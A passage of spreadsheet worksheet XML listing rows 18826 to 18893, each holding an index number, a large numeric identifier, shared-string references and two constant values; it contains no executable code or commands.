      </c>
      <c r="C18826" s="2" t="s">
        <v>18142</v>
      </c>
      <c r="D18826" s="2">
        <v>1.0</v>
      </c>
      <c r="E18826" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18826" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18827" ht="15.75" customHeight="1">
      <c r="A18827" s="1">
        <v>10114.0</v>
      </c>
      <c r="B18827" s="2">
        <v>5.724834E7</v>
      </c>
      <c r="C18827" s="2" t="s">
        <v>18143</v>
      </c>
      <c r="D18827" s="2">
        <v>1.0</v>
      </c>
      <c r="E18827" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18827" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18828" ht="15.75" customHeight="1">
      <c r="A18828" s="1">
        <v>10613.0</v>
      </c>
      <c r="B18828" s="2">
        <v>1.3728198E7</v>
      </c>
      <c r="C18828" s="2" t="s">
        <v>18144</v>
      </c>
      <c r="D18828" s="2">
        <v>1.0</v>
      </c>
      <c r="E18828" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18828" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18829" ht="15.75" customHeight="1">
      <c r="A18829" s="1">
        <v>10638.0</v>
      </c>
      <c r="B18829" s="2">
        <v>1.4119532E7</v>
      </c>
      <c r="C18829" s="2" t="s">
        <v>18145</v>
      </c>
      <c r="D18829" s="2">
        <v>1.0</v>
      </c>
      <c r="E18829" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18829" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18830" ht="15.75" customHeight="1">
      <c r="A18830" s="1">
        <v>10665.0</v>
      </c>
      <c r="B18830" s="2">
        <v>1.4342804E7</v>
      </c>
      <c r="C18830" s="2" t="s">
        <v>18146</v>
      </c>
      <c r="D18830" s="2">
        <v>1.0</v>
      </c>
      <c r="E18830" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18830" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18831" ht="15.75" customHeight="1">
      <c r="A18831" s="1">
        <v>10680.0</v>
      </c>
      <c r="B18831" s="2">
        <v>1.4661584E7</v>
      </c>
      <c r="C18831" s="2" t="s">
        <v>18147</v>
      </c>
      <c r="D18831" s="2">
        <v>1.0</v>
      </c>
      <c r="E18831" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18831" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18832" ht="15.75" customHeight="1">
      <c r="A18832" s="1">
        <v>10759.0</v>
      </c>
      <c r="B18832" s="2">
        <v>1.5529105E7</v>
      </c>
      <c r="C18832" s="2" t="s">
        <v>18148</v>
      </c>
      <c r="D18832" s="2">
        <v>1.0</v>
      </c>
      <c r="E18832" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18832" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18833" ht="15.75" customHeight="1">
      <c r="A18833" s="1">
        <v>10835.0</v>
      </c>
      <c r="B18833" s="2">
        <v>1.5992104E7</v>
      </c>
      <c r="C18833" s="2" t="s">
        <v>18149</v>
      </c>
      <c r="D18833" s="2">
        <v>1.0</v>
      </c>
      <c r="E18833" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18833" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18834" ht="15.75" customHeight="1">
      <c r="A18834" s="1">
        <v>11104.0</v>
      </c>
      <c r="B18834" s="2">
        <v>1.864197E7</v>
      </c>
      <c r="C18834" s="2" t="s">
        <v>18150</v>
      </c>
      <c r="D18834" s="2">
        <v>1.0</v>
      </c>
      <c r="E18834" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18834" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18835" ht="15.75" customHeight="1">
      <c r="A18835" s="1">
        <v>11211.0</v>
      </c>
      <c r="B18835" s="2">
        <v>2.0086333E7</v>
      </c>
      <c r="C18835" s="2" t="s">
        <v>18151</v>
      </c>
      <c r="D18835" s="2">
        <v>1.0</v>
      </c>
      <c r="E18835" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18835" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18836" ht="15.75" customHeight="1">
      <c r="A18836" s="1">
        <v>11247.0</v>
      </c>
      <c r="B18836" s="2">
        <v>2.0479539E7</v>
      </c>
      <c r="C18836" s="2" t="s">
        <v>18152</v>
      </c>
      <c r="D18836" s="2">
        <v>1.0</v>
      </c>
      <c r="E18836" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18836" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18837" ht="15.75" customHeight="1">
      <c r="A18837" s="1">
        <v>11267.0</v>
      </c>
      <c r="B18837" s="2">
        <v>2.0689132E7</v>
      </c>
      <c r="C18837" s="2" t="s">
        <v>18153</v>
      </c>
      <c r="D18837" s="2">
        <v>1.0</v>
      </c>
      <c r="E18837" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18837" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18838" ht="15.75" customHeight="1">
      <c r="A18838" s="1">
        <v>11524.0</v>
      </c>
      <c r="B18838" s="2">
        <v>2.238507E7</v>
      </c>
      <c r="C18838" s="2" t="s">
        <v>18154</v>
      </c>
      <c r="D18838" s="2">
        <v>1.0</v>
      </c>
      <c r="E18838" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18838" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18839" ht="15.75" customHeight="1">
      <c r="A18839" s="1">
        <v>11736.0</v>
      </c>
      <c r="B18839" s="2">
        <v>2.4048326E7</v>
      </c>
      <c r="C18839" s="2" t="s">
        <v>18155</v>
      </c>
      <c r="D18839" s="2">
        <v>1.0</v>
      </c>
      <c r="E18839" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18839" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18840" ht="15.75" customHeight="1">
      <c r="A18840" s="1">
        <v>11774.0</v>
      </c>
      <c r="B18840" s="2">
        <v>2.4252828E7</v>
      </c>
      <c r="C18840" s="2" t="s">
        <v>18156</v>
      </c>
      <c r="D18840" s="2">
        <v>1.0</v>
      </c>
      <c r="E18840" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18840" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18841" ht="15.75" customHeight="1">
      <c r="A18841" s="1">
        <v>12371.0</v>
      </c>
      <c r="B18841" s="2">
        <v>2.8820257E7</v>
      </c>
      <c r="C18841" s="2" t="s">
        <v>18157</v>
      </c>
      <c r="D18841" s="2">
        <v>1.0</v>
      </c>
      <c r="E18841" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18841" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18842" ht="15.75" customHeight="1">
      <c r="A18842" s="1">
        <v>12506.0</v>
      </c>
      <c r="B18842" s="2">
        <v>2.9638773E7</v>
      </c>
      <c r="C18842" s="2" t="s">
        <v>18158</v>
      </c>
      <c r="D18842" s="2">
        <v>1.0</v>
      </c>
      <c r="E18842" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18842" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18843" ht="15.75" customHeight="1">
      <c r="A18843" s="1">
        <v>12778.0</v>
      </c>
      <c r="B18843" s="2">
        <v>3.1318354E7</v>
      </c>
      <c r="C18843" s="2" t="s">
        <v>18159</v>
      </c>
      <c r="D18843" s="2">
        <v>1.0</v>
      </c>
      <c r="E18843" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18843" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18844" ht="15.75" customHeight="1">
      <c r="A18844" s="1">
        <v>13043.0</v>
      </c>
      <c r="B18844" s="2">
        <v>3.3077997E7</v>
      </c>
      <c r="C18844" s="2" t="s">
        <v>18160</v>
      </c>
      <c r="D18844" s="2">
        <v>1.0</v>
      </c>
      <c r="E18844" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18844" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18845" ht="15.75" customHeight="1">
      <c r="A18845" s="1">
        <v>13454.0</v>
      </c>
      <c r="B18845" s="2">
        <v>3.5188943E7</v>
      </c>
      <c r="C18845" s="2" t="s">
        <v>18161</v>
      </c>
      <c r="D18845" s="2">
        <v>1.0</v>
      </c>
      <c r="E18845" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18845" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18846" ht="15.75" customHeight="1">
      <c r="A18846" s="1">
        <v>13637.0</v>
      </c>
      <c r="B18846" s="2">
        <v>3.5911928E7</v>
      </c>
      <c r="C18846" s="2" t="s">
        <v>18162</v>
      </c>
      <c r="D18846" s="2">
        <v>1.0</v>
      </c>
      <c r="E18846" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18846" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18847" ht="15.75" customHeight="1">
      <c r="A18847" s="1">
        <v>13814.0</v>
      </c>
      <c r="B18847" s="2">
        <v>3.6674361E7</v>
      </c>
      <c r="C18847" s="2" t="s">
        <v>18163</v>
      </c>
      <c r="D18847" s="2">
        <v>1.0</v>
      </c>
      <c r="E18847" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18847" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18848" ht="15.75" customHeight="1">
      <c r="A18848" s="1">
        <v>13950.0</v>
      </c>
      <c r="B18848" s="2">
        <v>3.7211019E7</v>
      </c>
      <c r="C18848" s="2" t="s">
        <v>18164</v>
      </c>
      <c r="D18848" s="2">
        <v>1.0</v>
      </c>
      <c r="E18848" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18848" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18849" ht="15.75" customHeight="1">
      <c r="A18849" s="1">
        <v>14035.0</v>
      </c>
      <c r="B18849" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C18849" s="2" t="s">
        <v>18165</v>
      </c>
      <c r="D18849" s="2">
        <v>1.0</v>
      </c>
      <c r="E18849" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18849" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18850" ht="15.75" customHeight="1">
      <c r="A18850" s="1">
        <v>14148.0</v>
      </c>
      <c r="B18850" s="2">
        <v>3.7975827E7</v>
      </c>
      <c r="C18850" s="2" t="s">
        <v>18166</v>
      </c>
      <c r="D18850" s="2">
        <v>1.0</v>
      </c>
      <c r="E18850" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18850" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18851" ht="15.75" customHeight="1">
      <c r="A18851" s="1">
        <v>14276.0</v>
      </c>
      <c r="B18851" s="2">
        <v>3.8443304E7</v>
      </c>
      <c r="C18851" s="2" t="s">
        <v>18167</v>
      </c>
      <c r="D18851" s="2">
        <v>1.0</v>
      </c>
      <c r="E18851" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18851" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18852" ht="15.75" customHeight="1">
      <c r="A18852" s="1">
        <v>14311.0</v>
      </c>
      <c r="B18852" s="2">
        <v>3.8638702E7</v>
      </c>
      <c r="C18852" s="2" t="s">
        <v>18168</v>
      </c>
      <c r="D18852" s="2">
        <v>1.0</v>
      </c>
      <c r="E18852" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18852" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18853" ht="15.75" customHeight="1">
      <c r="A18853" s="1">
        <v>14700.0</v>
      </c>
      <c r="B18853" s="2">
        <v>4.0579423E7</v>
      </c>
      <c r="C18853" s="2" t="s">
        <v>18169</v>
      </c>
      <c r="D18853" s="2">
        <v>1.0</v>
      </c>
      <c r="E18853" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18853" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18854" ht="15.75" customHeight="1">
      <c r="A18854" s="1">
        <v>14748.0</v>
      </c>
      <c r="B18854" s="2">
        <v>4.0741378E7</v>
      </c>
      <c r="C18854" s="2" t="s">
        <v>18170</v>
      </c>
      <c r="D18854" s="2">
        <v>1.0</v>
      </c>
      <c r="E18854" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18854" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18855" ht="15.75" customHeight="1">
      <c r="A18855" s="1">
        <v>15021.0</v>
      </c>
      <c r="B18855" s="2">
        <v>4.1542401E7</v>
      </c>
      <c r="C18855" s="2" t="s">
        <v>18171</v>
      </c>
      <c r="D18855" s="2">
        <v>1.0</v>
      </c>
      <c r="E18855" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18855" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18856" ht="15.75" customHeight="1">
      <c r="A18856" s="1">
        <v>15369.0</v>
      </c>
      <c r="B18856" s="2">
        <v>4.2726672E7</v>
      </c>
      <c r="C18856" s="2" t="s">
        <v>18172</v>
      </c>
      <c r="D18856" s="2">
        <v>1.0</v>
      </c>
      <c r="E18856" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18856" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18857" ht="15.75" customHeight="1">
      <c r="A18857" s="1">
        <v>16258.0</v>
      </c>
      <c r="B18857" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C18857" s="2" t="s">
        <v>18173</v>
      </c>
      <c r="D18857" s="2">
        <v>1.0</v>
      </c>
      <c r="E18857" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18857" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18858" ht="15.75" customHeight="1">
      <c r="A18858" s="1">
        <v>16344.0</v>
      </c>
      <c r="B18858" s="2">
        <v>4.6083023E7</v>
      </c>
      <c r="C18858" s="2" t="s">
        <v>18174</v>
      </c>
      <c r="D18858" s="2">
        <v>1.0</v>
      </c>
      <c r="E18858" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18858" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18859" ht="15.75" customHeight="1">
      <c r="A18859" s="1">
        <v>16649.0</v>
      </c>
      <c r="B18859" s="2">
        <v>4719527.0</v>
      </c>
      <c r="C18859" s="2" t="s">
        <v>18124</v>
      </c>
      <c r="D18859" s="2">
        <v>1.0</v>
      </c>
      <c r="E18859" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18859" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18860" ht="15.75" customHeight="1">
      <c r="A18860" s="1">
        <v>16708.0</v>
      </c>
      <c r="B18860" s="2">
        <v>4.7425716E7</v>
      </c>
      <c r="C18860" s="2" t="s">
        <v>18175</v>
      </c>
      <c r="D18860" s="2">
        <v>1.0</v>
      </c>
      <c r="E18860" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18860" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18861" ht="15.75" customHeight="1">
      <c r="A18861" s="1">
        <v>17421.0</v>
      </c>
      <c r="B18861" s="2">
        <v>4.9699033E7</v>
      </c>
      <c r="C18861" s="2" t="s">
        <v>18176</v>
      </c>
      <c r="D18861" s="2">
        <v>1.0</v>
      </c>
      <c r="E18861" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18861" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18862" ht="15.75" customHeight="1">
      <c r="A18862" s="1">
        <v>18035.0</v>
      </c>
      <c r="B18862" s="2">
        <v>5.153583E7</v>
      </c>
      <c r="C18862" s="2" t="s">
        <v>18177</v>
      </c>
      <c r="D18862" s="2">
        <v>1.0</v>
      </c>
      <c r="E18862" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18862" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18863" ht="15.75" customHeight="1">
      <c r="A18863" s="1">
        <v>18134.0</v>
      </c>
      <c r="B18863" s="2">
        <v>5.1814187E7</v>
      </c>
      <c r="C18863" s="2" t="s">
        <v>18178</v>
      </c>
      <c r="D18863" s="2">
        <v>1.0</v>
      </c>
      <c r="E18863" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18863" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18864" ht="15.75" customHeight="1">
      <c r="A18864" s="1">
        <v>18186.0</v>
      </c>
      <c r="B18864" s="2">
        <v>5.2025107E7</v>
      </c>
      <c r="C18864" s="2" t="s">
        <v>18179</v>
      </c>
      <c r="D18864" s="2">
        <v>1.0</v>
      </c>
      <c r="E18864" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18864" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18865" ht="15.75" customHeight="1">
      <c r="A18865" s="1">
        <v>18792.0</v>
      </c>
      <c r="B18865" s="2">
        <v>5.383426E7</v>
      </c>
      <c r="C18865" s="2" t="s">
        <v>18180</v>
      </c>
      <c r="D18865" s="2">
        <v>1.0</v>
      </c>
      <c r="E18865" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18865" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18866" ht="15.75" customHeight="1">
      <c r="A18866" s="1">
        <v>18889.0</v>
      </c>
      <c r="B18866" s="2">
        <v>5.4119375E7</v>
      </c>
      <c r="C18866" s="2" t="s">
        <v>18181</v>
      </c>
      <c r="D18866" s="2">
        <v>1.0</v>
      </c>
      <c r="E18866" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18866" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18867" ht="15.75" customHeight="1">
      <c r="A18867" s="1">
        <v>18967.0</v>
      </c>
      <c r="B18867" s="2">
        <v>5.4359824E7</v>
      </c>
      <c r="C18867" s="2" t="s">
        <v>18182</v>
      </c>
      <c r="D18867" s="2">
        <v>1.0</v>
      </c>
      <c r="E18867" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18867" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18868" ht="15.75" customHeight="1">
      <c r="A18868" s="1">
        <v>19173.0</v>
      </c>
      <c r="B18868" s="2">
        <v>5.4971322E7</v>
      </c>
      <c r="C18868" s="2" t="s">
        <v>18183</v>
      </c>
      <c r="D18868" s="2">
        <v>1.0</v>
      </c>
      <c r="E18868" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18868" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18869" ht="15.75" customHeight="1">
      <c r="A18869" s="1">
        <v>19268.0</v>
      </c>
      <c r="B18869" s="2">
        <v>5.5154153E7</v>
      </c>
      <c r="C18869" s="2" t="s">
        <v>18184</v>
      </c>
      <c r="D18869" s="2">
        <v>1.0</v>
      </c>
      <c r="E18869" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18869" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18870" ht="15.75" customHeight="1">
      <c r="A18870" s="1">
        <v>19321.0</v>
      </c>
      <c r="B18870" s="2">
        <v>5.5308181E7</v>
      </c>
      <c r="C18870" s="2" t="s">
        <v>18185</v>
      </c>
      <c r="D18870" s="2">
        <v>1.0</v>
      </c>
      <c r="E18870" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18870" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18871" ht="15.75" customHeight="1">
      <c r="A18871" s="1">
        <v>19451.0</v>
      </c>
      <c r="B18871" s="2">
        <v>5.5729674E7</v>
      </c>
      <c r="C18871" s="2" t="s">
        <v>18186</v>
      </c>
      <c r="D18871" s="2">
        <v>1.0</v>
      </c>
      <c r="E18871" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18871" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18872" ht="15.75" customHeight="1">
      <c r="A18872" s="1">
        <v>19608.0</v>
      </c>
      <c r="B18872" s="2">
        <v>5.6185691E7</v>
      </c>
      <c r="C18872" s="2" t="s">
        <v>18187</v>
      </c>
      <c r="D18872" s="2">
        <v>1.0</v>
      </c>
      <c r="E18872" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18872" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18873" ht="15.75" customHeight="1">
      <c r="A18873" s="1">
        <v>19694.0</v>
      </c>
      <c r="B18873" s="2">
        <v>5.6476008E7</v>
      </c>
      <c r="C18873" s="2" t="s">
        <v>18188</v>
      </c>
      <c r="D18873" s="2">
        <v>1.0</v>
      </c>
      <c r="E18873" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18873" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18874" ht="15.75" customHeight="1">
      <c r="A18874" s="1">
        <v>20162.0</v>
      </c>
      <c r="B18874" s="2">
        <v>1.0321236E7</v>
      </c>
      <c r="C18874" s="2" t="s">
        <v>18189</v>
      </c>
      <c r="D18874" s="2">
        <v>1.0</v>
      </c>
      <c r="E18874" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18874" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18875" ht="15.75" customHeight="1">
      <c r="A18875" s="1">
        <v>20449.0</v>
      </c>
      <c r="B18875" s="2">
        <v>1.2498852E7</v>
      </c>
      <c r="C18875" s="2" t="s">
        <v>18190</v>
      </c>
      <c r="D18875" s="2">
        <v>1.0</v>
      </c>
      <c r="E18875" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18875" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18876" ht="15.75" customHeight="1">
      <c r="A18876" s="1">
        <v>20459.0</v>
      </c>
      <c r="B18876" s="2">
        <v>1.267868E7</v>
      </c>
      <c r="C18876" s="2" t="s">
        <v>18191</v>
      </c>
      <c r="D18876" s="2">
        <v>1.0</v>
      </c>
      <c r="E18876" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18876" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18877" ht="15.75" customHeight="1">
      <c r="A18877" s="1">
        <v>20493.0</v>
      </c>
      <c r="B18877" s="2">
        <v>1.287145E7</v>
      </c>
      <c r="C18877" s="2" t="s">
        <v>18192</v>
      </c>
      <c r="D18877" s="2">
        <v>1.0</v>
      </c>
      <c r="E18877" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18877" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18878" ht="15.75" customHeight="1">
      <c r="A18878" s="1">
        <v>20526.0</v>
      </c>
      <c r="B18878" s="2">
        <v>1.3171895E7</v>
      </c>
      <c r="C18878" s="2" t="s">
        <v>18193</v>
      </c>
      <c r="D18878" s="2">
        <v>1.0</v>
      </c>
      <c r="E18878" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18878" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18879" ht="15.75" customHeight="1">
      <c r="A18879" s="1">
        <v>20530.0</v>
      </c>
      <c r="B18879" s="2">
        <v>1.3198649E7</v>
      </c>
      <c r="C18879" s="2" t="s">
        <v>18194</v>
      </c>
      <c r="D18879" s="2">
        <v>1.0</v>
      </c>
      <c r="E18879" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18879" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18880" ht="15.75" customHeight="1">
      <c r="A18880" s="1">
        <v>20715.0</v>
      </c>
      <c r="B18880" s="2">
        <v>1.4625176E7</v>
      </c>
      <c r="C18880" s="2" t="s">
        <v>18195</v>
      </c>
      <c r="D18880" s="2">
        <v>1.0</v>
      </c>
      <c r="E18880" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18880" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18881" ht="15.75" customHeight="1">
      <c r="A18881" s="1">
        <v>21319.0</v>
      </c>
      <c r="B18881" s="2">
        <v>2.0893449E7</v>
      </c>
      <c r="C18881" s="2" t="s">
        <v>18196</v>
      </c>
      <c r="D18881" s="2">
        <v>1.0</v>
      </c>
      <c r="E18881" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18881" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18882" ht="15.75" customHeight="1">
      <c r="A18882" s="1">
        <v>21328.0</v>
      </c>
      <c r="B18882" s="2">
        <v>2.1023261E7</v>
      </c>
      <c r="C18882" s="2" t="s">
        <v>18197</v>
      </c>
      <c r="D18882" s="2">
        <v>1.0</v>
      </c>
      <c r="E18882" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18882" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18883" ht="15.75" customHeight="1">
      <c r="A18883" s="1">
        <v>21549.0</v>
      </c>
      <c r="B18883" s="2">
        <v>2.3576555E7</v>
      </c>
      <c r="C18883" s="2" t="s">
        <v>18198</v>
      </c>
      <c r="D18883" s="2">
        <v>1.0</v>
      </c>
      <c r="E18883" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18883" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18884" ht="15.75" customHeight="1">
      <c r="A18884" s="1">
        <v>21593.0</v>
      </c>
      <c r="B18884" s="2">
        <v>2.3995771E7</v>
      </c>
      <c r="C18884" s="2" t="s">
        <v>18199</v>
      </c>
      <c r="D18884" s="2">
        <v>1.0</v>
      </c>
      <c r="E18884" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18884" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18885" ht="15.75" customHeight="1">
      <c r="A18885" s="1">
        <v>21865.0</v>
      </c>
      <c r="B18885" s="2">
        <v>2.7417015E7</v>
      </c>
      <c r="C18885" s="2" t="s">
        <v>18200</v>
      </c>
      <c r="D18885" s="2">
        <v>1.0</v>
      </c>
      <c r="E18885" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18885" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18886" ht="15.75" customHeight="1">
      <c r="A18886" s="1">
        <v>22094.0</v>
      </c>
      <c r="B18886" s="2">
        <v>3.0778498E7</v>
      </c>
      <c r="C18886" s="2" t="s">
        <v>18201</v>
      </c>
      <c r="D18886" s="2">
        <v>1.0</v>
      </c>
      <c r="E18886" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18886" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18887" ht="15.75" customHeight="1">
      <c r="A18887" s="1">
        <v>22360.0</v>
      </c>
      <c r="B18887" s="2">
        <v>3.4740797E7</v>
      </c>
      <c r="C18887" s="2" t="s">
        <v>18202</v>
      </c>
      <c r="D18887" s="2">
        <v>1.0</v>
      </c>
      <c r="E18887" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18887" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18888" ht="15.75" customHeight="1">
      <c r="A18888" s="1">
        <v>22716.0</v>
      </c>
      <c r="B18888" s="2">
        <v>4.3403157E7</v>
      </c>
      <c r="C18888" s="2" t="s">
        <v>18203</v>
      </c>
      <c r="D18888" s="2">
        <v>1.0</v>
      </c>
      <c r="E18888" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18888" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18889" ht="15.75" customHeight="1">
      <c r="A18889" s="1">
        <v>22878.0</v>
      </c>
      <c r="B18889" s="2">
        <v>4.7609722E7</v>
      </c>
      <c r="C18889" s="2" t="s">
        <v>18204</v>
      </c>
      <c r="D18889" s="2">
        <v>1.0</v>
      </c>
      <c r="E18889" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18889" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18890" ht="15.75" customHeight="1">
      <c r="A18890" s="1">
        <v>22926.0</v>
      </c>
      <c r="B18890" s="2">
        <v>4855248.0</v>
      </c>
      <c r="C18890" s="2" t="s">
        <v>18205</v>
      </c>
      <c r="D18890" s="2">
        <v>1.0</v>
      </c>
      <c r="E18890" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18890" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18891" ht="15.75" customHeight="1">
      <c r="A18891" s="1">
        <v>22998.0</v>
      </c>
      <c r="B18891" s="2">
        <v>4.9628684E7</v>
      </c>
      <c r="C18891" s="2" t="s">
        <v>18206</v>
      </c>
      <c r="D18891" s="2">
        <v>1.0</v>
      </c>
      <c r="E18891" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18891" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18892" ht="15.75" customHeight="1">
      <c r="A18892" s="1">
        <v>23023.0</v>
      </c>
      <c r="B18892" s="2">
        <v>4998249.0</v>
      </c>
      <c r="C18892" s="2" t="s">
        <v>18207</v>
      </c>
      <c r="D18892" s="2">
        <v>1.0</v>
      </c>
      <c r="E18892" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18892" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18893" ht="15.75" customHeight="1">
      <c r="A18893" s="1">
        <v>23199.0</v>
      </c>
      <c r="B18893" s="2">
        <v>5247855.0</v>
      </c>
